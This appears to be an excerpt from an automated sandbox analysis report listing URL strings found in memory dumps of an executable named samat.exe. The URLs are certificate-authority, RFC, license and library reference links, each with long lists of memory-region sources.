Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es0
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.esS
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://passport.net/tb
Source: samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561108918.000001BCCCA7C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCA78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5234
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4534182312.000001BCCD3E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlD
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm2
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es00
Source: samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/
Source: samat.exe, 00000007.00000003.2999845052.00000209A4401000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A4400000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4564064125.000001BCCD44C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530993878.000001BCCD44A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020584454.000001BCCC37F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/t
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: samat.exe, 00000008.00000003.3025267001.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8D4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: samat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
